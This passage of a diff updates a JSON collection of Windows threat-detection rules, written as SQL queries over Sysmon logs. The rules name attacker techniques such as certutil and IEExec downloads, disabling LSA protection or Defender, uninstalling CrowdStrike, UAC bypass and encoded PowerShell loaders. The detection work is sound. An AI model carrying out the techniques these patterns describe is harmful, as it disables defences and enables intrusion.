ESCAPE '\\' OR CommandLine LIKE '%Cb Defense Sensor 64-bit%' ESCAPE '\\' OR CommandLine LIKE '%Crowdstrike Sensor%' ESCAPE '\\' OR CommandLine LIKE '%Cylance %' ESCAPE '\\' OR CommandLine LIKE '%Dell Threat Defense%' ESCAPE '\\' OR CommandLine LIKE '%DLP Endpoint%' ESCAPE '\\' OR CommandLine LIKE '%Endpoint Detection%' ESCAPE '\\' OR CommandLine LIKE '%Endpoint Protection%' ESCAPE '\\' OR CommandLine LIKE '%Endpoint Security%' ESCAPE '\\' OR CommandLine LIKE '%Endpoint Sensor%' ESCAPE '\\' OR CommandLine LIKE '%ESET File Security%' ESCAPE '\\' OR CommandLine LIKE '%LogRhythm System Monitor Service%' ESCAPE '\\' OR CommandLine LIKE '%Malwarebytes%' ESCAPE '\\' OR CommandLine LIKE '%McAfee Agent%' ESCAPE '\\' OR CommandLine LIKE '%Microsoft Security Client%' ESCAPE '\\' OR CommandLine LIKE '%Sophos Anti-Virus%' ESCAPE '\\' OR CommandLine LIKE '%Sophos AutoUpdate%' ESCAPE '\\' OR CommandLine LIKE '%Sophos Credential Store%' ESCAPE '\\' OR CommandLine LIKE '%Sophos Management Console%' ESCAPE '\\' OR CommandLine LIKE '%Sophos Management Database%' ESCAPE '\\' OR CommandLine LIKE '%Sophos Management Server%' ESCAPE '\\' OR CommandLine LIKE '%Sophos Remote Management System%' ESCAPE '\\' OR CommandLine LIKE '%Sophos Update Manager%' ESCAPE '\\' OR CommandLine LIKE '%Threat Protection%' ESCAPE '\\' OR CommandLine LIKE '%VirusScan%' ESCAPE '\\' OR CommandLine LIKE '%Webroot SecureAnywhere%' ESCAPE '\\' OR CommandLine LIKE '%Windows Defender%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ParentImage LIKE '%\\\\EQNEDT32.EXE' ESCAPE '\\' OR ParentImage LIKE '%\\\\EXCEL.EXE' ESCAPE '\\' OR ParentImage LIKE '%\\\\MSACCESS.EXE' ESCAPE '\\' OR ParentImage LIKE '%\\\\MSPUB.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\ONENOTE.EXE' ESCAPE '\\' OR ParentImage LIKE '%\\\\POWERPNT.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\VISIO.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\WINWORD.EXE' ESCAPE '\\' OR ParentImage LIKE 
'%\\\\wordpad.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\wordview.exe' ESCAPE '\\') AND (OriginalFileName IN ('bitsadmin.exe', 'CertOC.exe', 'CertUtil.exe', 'Cmd.Exe', 'CMSTP.EXE', 'cscript.exe', 'curl.exe', 'HH.exe', 'IEExec.exe', 'InstallUtil.exe', 'javaw.exe', 'Microsoft.Workflow.Compiler.exe', 'msdt.exe', 'MSHTA.EXE', 'msiexec.exe', 'Msxsl.exe', 'odbcconf.exe', 'pcalua.exe', 'PowerShell.EXE', 'RegAsm.exe', 'RegSvcs.exe', 'REGSVR32.exe', 'RUNDLL32.exe', 'schtasks.exe', 'ScriptRunner.exe', 'wmic.exe', 'WorkFolders.exe', 'wscript.exe') OR (Image LIKE '%\\\\AppVLP.exe' ESCAPE '\\' OR Image LIKE '%\\\\bash.exe' ESCAPE '\\' OR Image LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR Image LIKE '%\\\\certoc.exe' ESCAPE '\\' OR Image LIKE '%\\\\certutil.exe' ESCAPE '\\' OR Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR Image LIKE '%\\\\cmstp.exe' ESCAPE '\\' OR Image LIKE '%\\\\control.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\curl.exe' ESCAPE '\\' OR Image LIKE '%\\\\forfiles.exe' ESCAPE '\\' OR Image LIKE '%\\\\hh.exe' ESCAPE '\\' OR Image LIKE '%\\\\ieexec.exe' ESCAPE '\\' OR Image LIKE '%\\\\installutil.exe' ESCAPE '\\' OR Image LIKE '%\\\\javaw.exe' ESCAPE '\\' OR Image LIKE '%\\\\mftrace.exe' ESCAPE '\\' OR Image LIKE '%\\\\Microsoft.Workflow.Compiler.exe' ESCAPE '\\' OR Image LIKE '%\\\\msbuild.exe' ESCAPE '\\' OR Image LIKE '%\\\\msdt.exe' ESCAPE '\\' OR Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR Image LIKE '%\\\\msidb.exe' ESCAPE '\\' OR Image LIKE '%\\\\msiexec.exe' ESCAPE '\\' OR Image LIKE '%\\\\msxsl.exe' ESCAPE '\\' OR Image LIKE '%\\\\odbcconf.exe' ESCAPE '\\' OR Image LIKE '%\\\\pcalua.exe' ESCAPE '\\' OR Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\regasm.exe' ESCAPE '\\' OR Image LIKE '%\\\\regsvcs.exe' ESCAPE '\\' OR Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR Image LIKE 
'%\\\\scrcons.exe' ESCAPE '\\' OR Image LIKE '%\\\\scriptrunner.exe' ESCAPE '\\' OR Image LIKE '%\\\\sh.exe' ESCAPE '\\' OR Image LIKE '%\\\\svchost.exe' ESCAPE '\\' OR Image LIKE '%\\\\verclsid.exe' ESCAPE '\\' OR Image LIKE '%\\\\wmic.exe' ESCAPE '\\' OR Image LIKE '%\\\\workfolders.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\') OR (Image LIKE '%\\\\AppData\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\ProgramData\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Windows\\\\Tasks\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Windows\\\\System32\\\\Tasks\\\\%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_wmic_uninstall_security_products.yml" + "filename": "proc_creation_win_office_susp_child_processes.yml" }, { - "title": "Disable Windows Defender AV Security Monitoring", - "id": "a7ee1722-c3c5-aeff-3212-c777e4733217", + "title": "Abusing IEExec To Download Payloads", + "id": "9801abb8-e297-4dbf-9fbd-57dde0e830ad", "status": "experimental", - "description": "Detects attackers attempting to disable Windows Defender using Powershell", - "author": "ok @securonix invrep-de, oscd.community, frack113", + "description": "Detects execution of the IEExec utility to download payloads", + "author": "Nasreddine Bencherchali (Nextron Systems)", + "falsepositives": [ + "Unknown" + ], + "level": "high", + "rule": [ + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\IEExec.exe' ESCAPE '\\' OR OriginalFileName = 'IEExec.exe') AND (CommandLine LIKE '%https://%' ESCAPE '\\' OR CommandLine LIKE '%http://%' ESCAPE '\\'))" + ], + "filename": "proc_creation_win_lolbin_ieexec_download.yml" + }, + { + "title": "LSA PPL Protection Disabled Via Reg.EXE", + "id": "8c0eca51-0f88-4db2-9183-fdfb10c703f9", + "status": "experimental", + "description": "Detects the usage of the \"reg.exe\" utility to disable PPL protection on 
the LSA process", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1562.001" + "attack.t1562.010" ], "falsepositives": [ - "Minimal, for some older versions of dev tools, such as pycharm, developers were known to sometimes disable Windows Defender to improve performance, but this generally is not considered a good security practice." + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')) AND (CommandLine LIKE '%-DisableBehaviorMonitoring $true%' ESCAPE '\\' OR CommandLine LIKE '%-DisableRuntimeMonitoring $true%' ESCAPE '\\')) OR ((Image LIKE '%\\\\sc.exe' ESCAPE '\\' OR OriginalFileName = 'sc.exe') AND ((CommandLine LIKE '%stop%' ESCAPE '\\' AND CommandLine LIKE '%WinDefend%' ESCAPE '\\') OR (CommandLine LIKE '%delete%' ESCAPE '\\' AND CommandLine LIKE '%WinDefend%' ESCAPE '\\') OR (CommandLine LIKE '%config%' ESCAPE '\\' AND CommandLine LIKE '%WinDefend%' ESCAPE '\\' AND CommandLine LIKE '%start=disabled%' ESCAPE '\\')))))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\reg.exe' ESCAPE '\\' OR OriginalFileName = 'reg.exe') AND (CommandLine LIKE '%SYSTEM\\\\CurrentControlSet\\\\Control\\\\Lsa%' ESCAPE '\\' AND CommandLine LIKE '% add %' ESCAPE '\\' AND CommandLine LIKE '% /d 0%' ESCAPE '\\' AND CommandLine LIKE '% /v RunAsPPL %' ESCAPE '\\'))" ], - "filename": "proc_creation_win_powershell_disable_defender_av_security_monitoring.yml" + "filename": "proc_creation_win_reg_lsa_ppl_protection_disabled.yml" }, { - "title": "Uninstall Crowdstrike Falcon Sensor", - "id": "f0f7be61-9cf5-43be-9836-99d6ef448a18", - "status": "test", - "description": "Adversaries may disable security tools to avoid possible detection of their 
tools and activities by uninstalling Crowdstrike Falcon", + "title": "PUA - Suspicious ActiveDirectory Enumeration Via AdFind.EXE", + "id": "455b9d50-15a1-4b99-853f-8d37655a4c1b", + "status": "experimental", + "description": "Detects active directory enumeration activity using known AdFind CLI flags", "author": "frack113", "tags": [ - "attack.defense_evasion", - "attack.t1562.001" + "attack.discovery", + "attack.t1087.002" ], "falsepositives": [ - "Administrator might leverage the same command line for debugging or other purposes. However this action must be always investigated" + "Authorized administrative activity" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%\\\\WindowsSensor.exe%' ESCAPE '\\' AND CommandLine LIKE '% /uninstall%' ESCAPE '\\' AND CommandLine LIKE '% /quiet%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%lockoutduration%' ESCAPE '\\' OR CommandLine LIKE '%lockoutthreshold%' ESCAPE '\\' OR CommandLine LIKE '%lockoutobservationwindow%' ESCAPE '\\' OR CommandLine LIKE '%maxpwdage%' ESCAPE '\\' OR CommandLine LIKE '%minpwdage%' ESCAPE '\\' OR CommandLine LIKE '%minpwdlength%' ESCAPE '\\' OR CommandLine LIKE '%pwdhistorylength%' ESCAPE '\\' OR CommandLine LIKE '%pwdproperties%' ESCAPE '\\') OR CommandLine LIKE '%-sc admincountdmp%' ESCAPE '\\' OR CommandLine LIKE '%-sc exchaddresses%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_uninstall_crowdstrike_falcon.yml" + "filename": "proc_creation_win_pua_adfind_enumeration.yml" }, { - "title": "HTML Help Shell Spawn", - "id": "52cad028-0ff0-4854-8f67-d25dfcbc78b4", - "status": "test", - "description": "Detects a suspicious child process of a Microsoft HTML Help system when executing compiled HTML files (.chm)", - "author": "Maxim Pavlunin", + "title": "Potential WinAPI Calls Via CommandLine", + "id": 
"ba3f5c1b-6272-4119-9dbd-0bc8d21c2702", + "status": "experimental", + "description": "Detects the use of WinAPI Functions via the commandline. As seen used by threat actors via the tool winapiexec", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1218.001", - "attack.t1218.010", - "attack.t1218.011", "attack.execution", - "attack.t1059.001", - "attack.t1059.003", - "attack.t1059.005", - "attack.t1059.007", - "attack.t1047", - "attack.t1566", - "attack.t1566.001", - "attack.initial_access", - "attack.t1218" + "attack.t1106" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((ParentImage LIKE 'C:\\\\Windows\\\\hh.exe' ESCAPE '\\' OR ParentImage LIKE 'C:\\\\Windows\\\\SysWOW64\\\\hh.exe' ESCAPE '\\') AND (Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR Image LIKE '%\\\\wmic.exe' ESCAPE '\\' OR Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR Image LIKE '%\\\\MSHTA.EXE' ESCAPE '\\' OR Image LIKE '%\\\\CertUtil.exe' ESCAPE '\\' OR Image LIKE '%\\\\CertReq.exe' ESCAPE '\\' OR Image LIKE '%\\\\MSbuild.exe' ESCAPE '\\' OR Image LIKE '%\\\\installutil.exe' ESCAPE '\\' OR Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR Image LIKE '%\\\\msiexec.exe' ESCAPE '\\')) OR ((Image LIKE '%\\\\Windows\\\\hh.exe' ESCAPE '\\' OR Image LIKE '%\\\\Windows\\\\SysWOW64\\\\hh.exe' ESCAPE '\\') AND (CommandLine LIKE '%.application%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Content.Outlook\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 
'Microsoft-Windows-Sysmon/Operational') AND (CommandLine LIKE '%AddSecurityPackage%' ESCAPE '\\' OR CommandLine LIKE '%AdjustTokenPrivileges%' ESCAPE '\\' OR CommandLine LIKE '%Advapi32%' ESCAPE '\\' OR CommandLine LIKE '%CloseHandle%' ESCAPE '\\' OR CommandLine LIKE '%CreateProcessWithToken%' ESCAPE '\\' OR CommandLine LIKE '%CreatePseudoConsole%' ESCAPE '\\' OR CommandLine LIKE '%CreateRemoteThread%' ESCAPE '\\' OR CommandLine LIKE '%CreateThread%' ESCAPE '\\' OR CommandLine LIKE '%CreateUserThread%' ESCAPE '\\' OR CommandLine LIKE '%DangerousGetHandle%' ESCAPE '\\' OR CommandLine LIKE '%DuplicateTokenEx%' ESCAPE '\\' OR CommandLine LIKE '%EnumerateSecurityPackages%' ESCAPE '\\' OR CommandLine LIKE '%FreeHGlobal%' ESCAPE '\\' OR CommandLine LIKE '%FreeLibrary%' ESCAPE '\\' OR CommandLine LIKE '%GetDelegateForFunctionPointer%' ESCAPE '\\' OR CommandLine LIKE '%GetLogonSessionData%' ESCAPE '\\' OR CommandLine LIKE '%GetModuleHandle%' ESCAPE '\\' OR CommandLine LIKE '%GetProcAddress%' ESCAPE '\\' OR CommandLine LIKE '%GetProcessHandle%' ESCAPE '\\' OR CommandLine LIKE '%GetTokenInformation%' ESCAPE '\\' OR CommandLine LIKE '%ImpersonateLoggedOnUser%' ESCAPE '\\' OR CommandLine LIKE '%kernel32%' ESCAPE '\\' OR CommandLine LIKE '%LoadLibrary%' ESCAPE '\\' OR CommandLine LIKE '%memcpy%' ESCAPE '\\' OR CommandLine LIKE '%MiniDumpWriteDump%' ESCAPE '\\' OR CommandLine LIKE '%ntdll%' ESCAPE '\\' OR CommandLine LIKE '%OpenDesktop%' ESCAPE '\\' OR CommandLine LIKE '%OpenProcess%' ESCAPE '\\' OR CommandLine LIKE '%OpenProcessToken%' ESCAPE '\\' OR CommandLine LIKE '%OpenThreadToken%' ESCAPE '\\' OR CommandLine LIKE '%OpenWindowStation%' ESCAPE '\\' OR CommandLine LIKE '%PtrToString%' ESCAPE '\\' OR CommandLine LIKE '%QueueUserApc%' ESCAPE '\\' OR CommandLine LIKE '%ReadProcessMemory%' ESCAPE '\\' OR CommandLine LIKE '%RevertToSelf%' ESCAPE '\\' OR CommandLine LIKE '%RtlCreateUserThread%' ESCAPE '\\' OR CommandLine LIKE '%secur32%' ESCAPE '\\' OR CommandLine LIKE 
'%SetThreadToken%' ESCAPE '\\' OR CommandLine LIKE '%VirtualAlloc%' ESCAPE '\\' OR CommandLine LIKE '%VirtualFree%' ESCAPE '\\' OR CommandLine LIKE '%VirtualProtect%' ESCAPE '\\' OR CommandLine LIKE '%WaitForSingleObject%' ESCAPE '\\' OR CommandLine LIKE '%WriteInt32%' ESCAPE '\\' OR CommandLine LIKE '%WriteProcessMemory%' ESCAPE '\\' OR CommandLine LIKE '%ZeroFreeGlobalAllocUnicode%' ESCAPE '\\') AND NOT ((Image LIKE '%\\\\MpCmdRun.exe' ESCAPE '\\' AND CommandLine LIKE '%GetLoadLibraryWAddress32%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_hh_html_help_susp_child_process.yml" + "filename": "proc_creation_win_susp_inline_win_api_access.yml" }, { - "title": "Terminal Service Process Spawn", - "id": "1012f107-b8f1-4271-af30-5aed2de89b39", + "title": "PowerShell Base64 Encoded Reflective Assembly Load", + "id": "62b7ccc9-23b4-471e-aa15-6da3663c4d59", "status": "test", - "description": "Detects a process spawned by the terminal service server process (this could be an indicator for an exploitation of CVE-2019-0708)", - "author": "Florian Roth (Nextron Systems)", - "tags": [ - "attack.initial_access", - "attack.t1190", - "attack.lateral_movement", - "attack.t1210", - "car.2013-07-002" - ], - "falsepositives": [ - "Unknown" - ], - "level": "high", - "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ParentCommandLine LIKE '%\\\\svchost.exe%' ESCAPE '\\' AND ParentCommandLine LIKE '%termsvcs%' ESCAPE '\\') AND NOT (((Image LIKE '%\\\\rdpclip.exe' ESCAPE '\\' OR Image LIKE '%:\\\\Windows\\\\System32\\\\csrss.exe' ESCAPE '\\' OR Image LIKE '%:\\\\Windows\\\\System32\\\\wininit.exe' ESCAPE '\\' OR Image LIKE '%:\\\\Windows\\\\System32\\\\winlogon.exe' ESCAPE '\\')) OR (Image = '')))" - ], - "filename": "proc_creation_win_svchost_termserv_proc_spawn.yml" - }, - { - "title": "Potential Process Injection Via Msra.EXE", - "id": "744a188b-0415-4792-896f-11ddb0588dbc", - "status": "experimental", - 
"description": "Detects potential process injection via Microsoft Remote Asssistance (Msra.exe) by looking at suspicious child processes spawned from the aforementioned process. It has been a target used by many threat actors and used for discovery and persistence tactics", - "author": "Alexander McDonald", + "description": "Detects base64 encoded .NET reflective loading of Assembly", + "author": "Christian Burkard (Nextron Systems), pH-T (Nextron Systems)", "tags": [ + "attack.execution", + "attack.t1059.001", "attack.defense_evasion", - "attack.t1055" + "attack.t1027", + "attack.t1620" ], "falsepositives": [ - "Legitimate use of Msra.exe" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\msra.exe' ESCAPE '\\' AND ParentCommandLine LIKE '%msra.exe' ESCAPE '\\' AND (Image LIKE '%\\\\arp.exe' ESCAPE '\\' OR Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR Image LIKE '%\\\\net.exe' ESCAPE '\\' OR Image LIKE '%\\\\netstat.exe' ESCAPE '\\' OR Image LIKE '%\\\\nslookup.exe' ESCAPE '\\' OR Image LIKE '%\\\\route.exe' ESCAPE '\\' OR Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR Image LIKE '%\\\\whoami.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%WwBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6AEwAbwBhAGQAKA%' ESCAPE '\\' OR CommandLine LIKE '%sAUgBlAGYAbABlAGMAdABpAG8AbgAuAEEAcwBzAGUAbQBiAGwAeQBdADoAOgBMAG8AYQBkACgA%' ESCAPE '\\' OR CommandLine LIKE '%bAFIAZQBmAGwAZQBjAHQAaQBvAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoATABvAGEAZAAoA%' ESCAPE '\\' OR CommandLine LIKE '%AFsAcgBlAGYAbABlAGMAdABpAG8AbgAuAGEAcwBzAGUAbQBiAGwAeQBdADoAOgAoACIATABvAGEAZAAiAC%' ESCAPE '\\' OR CommandLine LIKE '%BbAHIAZQBmAGwAZQBjAHQAaQBvAG4ALgBhAHMAcwBlAG0AYgBsAHkAXQA6ADoAKAAiAEwAbwBhAGQAIgAp%' ESCAPE '\\' OR CommandLine LIKE 
'%AWwByAGUAZgBsAGUAYwB0AGkAbwBuAC4AYQBzAHMAZQBtAGIAbAB5AF0AOgA6ACgAIgBMAG8AYQBkACIAK%' ESCAPE '\\' OR CommandLine LIKE '%WwBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6ACgAIgBMAG8AYQBkACIAKQ%' ESCAPE '\\' OR CommandLine LIKE '%sAUgBlAGYAbABlAGMAdABpAG8AbgAuAEEAcwBzAGUAbQBiAGwAeQBdADoAOgAoACIATABvAGEAZAAiACkA%' ESCAPE '\\' OR CommandLine LIKE '%bAFIAZQBmAGwAZQBjAHQAaQBvAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoAKAAiAEwAbwBhAGQAIgApA%' ESCAPE '\\' OR CommandLine LIKE '%WwByAGUAZgBsAGUAYwB0AGkAbwBuAC4AYQBzAHMAZQBtAGIAbAB5AF0AOgA6AEwAbwBhAGQAKA%' ESCAPE '\\' OR CommandLine LIKE '%sAcgBlAGYAbABlAGMAdABpAG8AbgAuAGEAcwBzAGUAbQBiAGwAeQBdADoAOgBMAG8AYQBkACgA%' ESCAPE '\\' OR CommandLine LIKE '%bAHIAZQBmAGwAZQBjAHQAaQBvAG4ALgBhAHMAcwBlAG0AYgBsAHkAXQA6ADoATABvAGEAZAAoA%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_msra_process_injection.yml" + "filename": "proc_creation_win_powershell_base64_reflection_assembly_load.yml" }, { - "title": "Renamed Office Binary Execution", - "id": "0b0cd537-fc77-4e6e-a973-e53495c1083d", - "status": "experimental", - "description": "Detects the execution of a renamed office binary", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Uninstall Crowdstrike Falcon Sensor", + "id": "f0f7be61-9cf5-43be-9836-99d6ef448a18", + "status": "test", + "description": "Adversaries may disable security tools to avoid possible detection of their tools and activities by uninstalling Crowdstrike Falcon", + "author": "frack113", "tags": [ - "attack.defense_evasion" + "attack.defense_evasion", + "attack.t1562.001" ], "falsepositives": [ - "Unknown" + "Administrator might leverage the same command line for debugging or other purposes. 
However this action must be always investigated" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (OriginalFileName IN ('Excel.exe', 'MSACCESS.EXE', 'OneNote.exe', 'POWERPNT.EXE', 'WinWord.exe') OR Description IN ('Microsoft Access', 'Microsoft Excel', 'Microsoft OneNote', 'Microsoft PowerPoint', 'Microsoft Word')) AND NOT ((Image LIKE '%\\\\EXCEL.exe' ESCAPE '\\' OR Image LIKE '%\\\\MSACCESS.exe' ESCAPE '\\' OR Image LIKE '%\\\\ONENOTE.EXE' ESCAPE '\\' OR Image LIKE '%\\\\POWERPNT.EXE' ESCAPE '\\' OR Image LIKE '%\\\\WINWORD.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%\\\\WindowsSensor.exe%' ESCAPE '\\' AND CommandLine LIKE '% /uninstall%' ESCAPE '\\' AND CommandLine LIKE '% /quiet%' ESCAPE '\\')" ], - "filename": "proc_creation_win_renamed_office_processes.yml" + "filename": "proc_creation_win_uninstall_crowdstrike_falcon.yml" }, { - "title": "Suspicious File Downloaded From Direct IP Via Certutil.EXE", - "id": "13e6fe51-d478-4c7e-b0f2-6da9b400a829", - "status": "experimental", - "description": "Detects the execution of certutil with certain flags that allow the utility to download files from direct IPs.", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "UAC Bypass Using Consent and Comctl32 - Process", + "id": "1ca6bd18-0ba0-44ca-851c-92ed89a61085", + "status": "test", + "description": "Detects the pattern of UAC Bypass using consent.exe and comctl32.dll (UACMe 22)", + "author": "Christian Burkard (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1027" + "attack.privilege_escalation", + "attack.t1548.002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\certutil.exe' ESCAPE '\\' OR OriginalFileName = 'CertUtil.exe') 
AND (CommandLine LIKE '%urlcache %' ESCAPE '\\' OR CommandLine LIKE '%verifyctl %' ESCAPE '\\') AND (CommandLine LIKE '%://1%' ESCAPE '\\' OR CommandLine LIKE '%://2%' ESCAPE '\\' OR CommandLine LIKE '%://3%' ESCAPE '\\' OR CommandLine LIKE '%://4%' ESCAPE '\\' OR CommandLine LIKE '%://5%' ESCAPE '\\' OR CommandLine LIKE '%://6%' ESCAPE '\\' OR CommandLine LIKE '%://7%' ESCAPE '\\' OR CommandLine LIKE '%://8%' ESCAPE '\\' OR CommandLine LIKE '%://9%' ESCAPE '\\')) AND NOT ((CommandLine LIKE '%://7-%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\consent.exe' ESCAPE '\\' AND Image LIKE '%\\\\werfault.exe' ESCAPE '\\' AND IntegrityLevel IN ('High', 'System'))" ], - "filename": "proc_creation_win_certutil_download_direct_ip.yml" + "filename": "proc_creation_win_uac_bypass_consent_comctl32.yml" }, { - "title": "Potential CVE-2022-26809 Exploitation Attempt", - "id": "a7cd7306-df8b-4398-b711-6f3e4935cf16", - "status": "experimental", - "description": "Detects suspicious remote procedure call (RPC) service anomalies based on the spawned sub processes (long shot to detect the exploitation of vulnerabilities like CVE-2022-26809)", - "author": "Florian Roth (Nextron Systems)", + "title": "Malicious Base64 Encoded PowerShell Keywords in Command Lines", + "id": "f26c6093-6f14-4b12-800f-0fcb46f5ffd0", + "status": "test", + "description": "Detects base64 encoded strings used in hidden malicious PowerShell command lines", + "author": "John Lambert (rule)", "tags": [ - "attack.initial_access", - "attack.t1190", "attack.execution", - "attack.t1569.002" + "attack.t1059.001" ], "falsepositives": [ - "Unknown", - "Some cases in which the service spawned a werfault.exe process" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE 'C:\\\\Windows\\\\System32\\\\svchost.exe' ESCAPE '\\' AND 
ParentCommandLine LIKE '%-k RPCSS%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')) AND CommandLine LIKE '% hidden %' ESCAPE '\\' AND (CommandLine LIKE '%AGkAdABzAGEAZABtAGkAbgAgAC8AdAByAGEAbgBzAGYAZQByA%' ESCAPE '\\' OR CommandLine LIKE '%aXRzYWRtaW4gL3RyYW5zZmVy%' ESCAPE '\\' OR CommandLine LIKE '%IAaQB0AHMAYQBkAG0AaQBuACAALwB0AHIAYQBuAHMAZgBlAHIA%' ESCAPE '\\' OR CommandLine LIKE '%JpdHNhZG1pbiAvdHJhbnNmZX%' ESCAPE '\\' OR CommandLine LIKE '%YgBpAHQAcwBhAGQAbQBpAG4AIAAvAHQAcgBhAG4AcwBmAGUAcg%' ESCAPE '\\' OR CommandLine LIKE '%Yml0c2FkbWluIC90cmFuc2Zlc%' ESCAPE '\\' OR CommandLine LIKE '%AGMAaAB1AG4AawBfAHMAaQB6AGUA%' ESCAPE '\\' OR CommandLine LIKE '%JABjAGgAdQBuAGsAXwBzAGkAegBlA%' ESCAPE '\\' OR CommandLine LIKE '%JGNodW5rX3Npem%' ESCAPE '\\' OR CommandLine LIKE '%QAYwBoAHUAbgBrAF8AcwBpAHoAZQ%' ESCAPE '\\' OR CommandLine LIKE '%RjaHVua19zaXpl%' ESCAPE '\\' OR CommandLine LIKE '%Y2h1bmtfc2l6Z%' ESCAPE '\\' OR CommandLine LIKE '%AE8ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4A%' ESCAPE '\\' OR CommandLine LIKE '%kATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8Abg%' ESCAPE '\\' OR CommandLine LIKE '%lPLkNvbXByZXNzaW9u%' ESCAPE '\\' OR CommandLine LIKE '%SQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuA%' ESCAPE '\\' OR CommandLine LIKE '%SU8uQ29tcHJlc3Npb2%' ESCAPE '\\' OR CommandLine LIKE '%Ty5Db21wcmVzc2lvb%' ESCAPE '\\' OR CommandLine LIKE 